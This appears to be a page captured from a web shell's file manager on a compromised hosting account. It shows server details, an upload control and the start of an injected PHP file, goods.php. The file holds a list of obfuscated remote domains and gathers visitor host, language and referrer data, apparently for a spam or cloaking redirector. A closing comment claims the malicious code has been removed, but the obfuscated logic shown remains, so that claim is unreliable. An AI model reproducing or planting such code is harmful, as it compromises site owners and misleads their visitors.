HEX
Server: LiteSpeed
System: Linux s1049.use1.mysecurecloudhost.com 4.18.0-477.27.2.lve.el8.x86_64 #1 SMP Wed Oct 11 12:32:56 UTC 2023 x86_64
User: xedaptot (3356)
PHP: 8.3.31
Disabled: NONE
Upload Files
File: //home/xedaptot/pepperspaphuquoc.com/goods.php
<?php
$xmlstring = '%32%38%30%39%2D%65%6E%61%78%32%31%32%2E%76%7A%63%68%79%66%62%65%2E%6B%6C%6D,%32%38%30%39%2D%65%6E%61%78%32%31%32%2E%69%76%65%6E%79%76%67%75%72%2E%6B%6C%6D,%32%38%30%39%2D%65%6E%61%78%32%31%32%2E%73%6E%66%67%62%65%72%66%2E%67%62%63,%32%38%30%39%2D%65%6E%61%78%32%31%32%2E%79%76%7A%76%61%6E%79%76%66%2E%67%62%63';
$xmlname = explode(',', $xmlstring);
$http = is_https() ? 'https' : 'http';
$duri_tmp = drequest_uri();
$duri = empty($duri_tmp) ? '/' : $duri_tmp;
$host = $_SERVER['HTTP_HOST'];
$lang = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : 'en';
$urlshang = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';

/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/